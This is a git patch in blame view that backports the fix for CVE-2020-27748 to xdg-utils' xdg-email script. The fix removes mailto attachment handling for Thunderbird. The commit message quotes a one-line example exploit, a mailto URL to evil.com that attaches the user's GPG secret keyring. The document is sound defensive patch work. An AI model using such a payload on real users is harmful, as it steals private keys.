Andrew Geissler | 5199d83 | 2021-09-24 16:47:35 -0500 | [diff] [blame^] | 1 | From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 |
| 2 | From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> |
| 3 | Date: Tue, 18 Aug 2020 16:52:24 +0100 |
| 4 | Subject: [PATCH] xdg-email: remove attachment handling from mailto |
| 5 | MIME-Version: 1.0 |
| 6 | Content-Type: text/plain; charset=UTF-8 |
| 7 | Content-Transfer-Encoding: 8bit |
| 8 | |
| 9 | This allows attacker to extract secrets from users: |
| 10 | |
| 11 | mailto:sid@evil.com?attach=/.gnupg/secring.gpg |
| 12 | |
| 13 | See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 |
| 14 | and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 |
| 15 | |
| 16 | Signed-off-by: Jรถrg Thalheim <joerg@thalheim.io> |
| 17 | --- |
| 18 | scripts/xdg-email.in | 7 +------ |
| 19 | 1 file changed, 1 insertion(+), 6 deletions(-) |
| 20 | |
| 21 | Upstream-Status: Backport |
| 22 | CVE: CVE-2020-27748 |
| 23 | |
| 24 | diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in |
| 25 | index 6db58ad..5d2f4f3 100644 |
| 26 | --- a/scripts/xdg-email.in |
| 27 | +++ b/scripts/xdg-email.in |
| 28 | @@ -32,7 +32,7 @@ _USAGE |
| 29 | |
| 30 | run_thunderbird() |
| 31 | { |
| 32 | - local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH |
| 33 | + local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY |
| 34 | THUNDERBIRD="$1" |
| 35 | MAILTO=$(echo "$2" | sed 's/^mailto://') |
| 36 | echo "$MAILTO" | grep -qs "^?" |
| 37 | @@ -48,7 +48,6 @@ run_thunderbird() |
| 38 | BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) |
| 39 | SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) |
| 40 | BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) |
| 41 | - ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) |
| 42 | |
| 43 | if [ -z "$TO" ] ; then |
| 44 | NEWMAILTO= |
| 45 | @@ -68,10 +67,6 @@ run_thunderbird() |
| 46 | NEWMAILTO="${NEWMAILTO},$BODY" |
| 47 | fi |
| 48 | |
| 49 | - if [ -n "$ATTACH" ] ; then |
| 50 | - NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" |
| 51 | - fi |
| 52 | - |
| 53 | NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') |
| 54 | DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" |
| 55 | "$THUNDERBIRD" -compose "$NEWMAILTO" |
| 56 | -- |
| 57 | GitLab |
| 58 | |